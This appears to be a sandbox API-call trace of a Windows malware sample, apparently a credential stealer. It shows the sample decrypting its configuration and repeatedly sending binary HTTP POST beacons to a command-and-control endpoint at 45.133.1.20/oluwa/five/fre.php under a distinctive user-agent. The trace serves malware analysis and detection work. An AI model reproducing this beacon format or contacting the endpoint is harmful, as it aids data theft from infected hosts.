GetProcessHeap () returned 0x6a0000 [0255.089] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0255.089] GetProcessHeap () returned 0x6a0000 [0255.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0255.090] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0255.091] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0255.091] GetProcessHeap () returned 0x6a0000 [0255.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6dae08 [0255.091] GetProcessHeap () returned 0x6a0000 [0255.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0255.092] GetProcessHeap () returned 0x6a0000 [0255.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0255.092] GetProcessHeap () returned 0x6a0000 [0255.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0255.093] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0255.094] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0255.094] GetProcessHeap () returned 0x6a0000 [0255.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0255.094] GetProcessHeap () returned 0x6a0000 [0255.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0255.095] send (s=0x888, buf=0x6bd460*, len=242, flags=0) returned 242 [0255.096] send (s=0x888, buf=0x6bb998*, len=159, flags=0) returned 159 [0255.096] GetProcessHeap () returned 0x6a0000 [0255.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0255.096] recv (in: s=0x888, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0255.184] GetProcessHeap () returned 0x6a0000 [0255.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0255.185] GetProcessHeap () returned 0x6a0000 [0255.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0255.185] GetProcessHeap () returned 0x6a0000 [0255.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dae08 | out: hHeap=0x6a0000) returned 1 [0255.185] GetProcessHeap () returned 0x6a0000 [0255.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0255.186] closesocket (s=0x888) returned 0 [0255.186] GetProcessHeap () returned 0x6a0000 [0255.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0255.186] GetProcessHeap () returned 0x6a0000 [0255.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0255.187] GetProcessHeap () returned 0x6a0000 [0255.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0255.187] GetProcessHeap () returned 0x6a0000 [0255.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0255.188] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15b8) returned 0x888 [0255.190] Sleep (dwMilliseconds=0xea60) [0255.191] GetProcessHeap () returned 0x6a0000 [0255.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0255.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.193] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.202] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0255.212] GetProcessHeap () returned 0x6a0000 [0255.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0255.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.213] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0255.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.215] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.216] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.216] GetProcessHeap () returned 0x6a0000 [0255.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0255.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.217] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0255.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.218] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0255.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.219] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0255.219] GetProcessHeap () returned 0x6a0000 [0255.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0255.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.220] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0255.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.221] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0255.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.222] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0255.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.228] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0255.228] GetProcessHeap () returned 0x6a0000 [0255.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0255.228] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0255.231] GetProcessHeap () returned 0x6a0000 [0255.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0255.231] GetProcessHeap () returned 0x6a0000 [0255.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0255.232] GetProcessHeap () returned 0x6a0000 [0255.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0255.233] GetProcessHeap () returned 0x6a0000 [0255.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0255.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.234] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.245] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0255.260] GetProcessHeap () returned 0x6a0000 [0255.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0255.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.261] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0255.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.263] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.264] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.264] GetProcessHeap () returned 0x6a0000 [0255.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0255.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.266] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0255.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.268] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0255.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.269] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0255.269] GetProcessHeap () returned 0x6a0000 [0255.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0255.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.270] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0255.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.274] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0255.275] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.276] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0255.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.277] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0255.277] GetProcessHeap () returned 0x6a0000 [0255.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0255.277] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0255.277] GetProcessHeap () returned 0x6a0000 [0255.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0255.278] socket (af=2, type=1, protocol=6) returned 0x88c [0255.278] connect (s=0x88c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0255.303] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0255.303] GetProcessHeap () returned 0x6a0000 [0255.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0255.304] GetProcessHeap () returned 0x6a0000 [0255.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0255.305] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0255.306] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0255.306] GetProcessHeap () returned 0x6a0000 [0255.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db348 [0255.306] GetProcessHeap () returned 0x6a0000 [0255.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0255.307] GetProcessHeap () returned 0x6a0000 [0255.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0255.307] GetProcessHeap () returned 0x6a0000 [0255.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0255.308] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0255.309] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0255.309] GetProcessHeap () returned 0x6a0000 [0255.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0255.309] GetProcessHeap () returned 0x6a0000 [0255.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0255.310] send (s=0x88c, buf=0x6bd460*, len=242, flags=0) returned 242 [0255.311] send (s=0x88c, buf=0x6bb998*, len=159, flags=0) returned 159 [0255.311] GetProcessHeap () returned 0x6a0000 [0255.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b9908 [0255.311] recv (in: s=0x88c, buf=0x6b9908, len=4048, flags=0 | out: buf=0x6b9908*) returned 204 [0255.387] GetProcessHeap () returned 0x6a0000 [0255.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0255.388] GetProcessHeap () returned 0x6a0000 [0255.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0255.389] GetProcessHeap () returned 0x6a0000 [0255.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db348 | out: hHeap=0x6a0000) returned 1 [0255.390] GetProcessHeap () returned 0x6a0000 [0255.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0255.390] closesocket (s=0x88c) returned 0 [0255.391] GetProcessHeap () returned 0x6a0000 [0255.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0255.391] GetProcessHeap () returned 0x6a0000 [0255.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0255.391] GetProcessHeap () returned 0x6a0000 [0255.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0255.391] GetProcessHeap () returned 0x6a0000 [0255.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0255.392] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b9908, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15bc) returned 0x88c [0255.395] Sleep (dwMilliseconds=0xea60) [0255.397] GetProcessHeap () returned 0x6a0000 [0255.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0255.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.398] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.407] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0255.447] GetProcessHeap () returned 0x6a0000 [0255.447] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0255.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.448] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0255.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.449] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.450] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.450] GetProcessHeap () returned 0x6a0000 [0255.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0255.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.452] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0255.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.453] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0255.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.456] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0255.456] GetProcessHeap () returned 0x6a0000 [0255.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0255.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.457] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0255.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.458] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0255.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.459] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0255.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.460] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0255.460] GetProcessHeap () returned 0x6a0000 [0255.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0255.460] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0255.460] GetProcessHeap () returned 0x6a0000 [0255.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0255.461] GetProcessHeap () returned 0x6a0000 [0255.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0255.461] GetProcessHeap () returned 0x6a0000 [0255.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0255.462] GetProcessHeap () returned 0x6a0000 [0255.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0255.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.463] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0255.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.481] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0255.496] GetProcessHeap () returned 0x6a0000 [0255.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0255.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.499] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0255.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.500] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0255.501] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.501] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0255.501] GetProcessHeap () returned 0x6a0000 [0255.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0255.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.502] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0255.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.504] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0255.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0255.504] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0255.504] GetProcessHeap () returned 0x6a0000 [0255.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0255.505] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.505] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0255.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.506] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0255.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.507] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0255.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.508] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0255.508] GetProcessHeap () returned 0x6a0000 [0255.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0255.508] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0255.508] GetProcessHeap () returned 0x6a0000 [0255.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0255.508] socket (af=2, type=1, protocol=6) returned 0x890 [0255.512] connect (s=0x890, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0255.537] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0255.537] GetProcessHeap () returned 0x6a0000 [0255.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0255.537] GetProcessHeap () returned 0x6a0000 [0255.537] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0255.538] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0255.539] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0255.539] GetProcessHeap () returned 0x6a0000 [0255.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db648 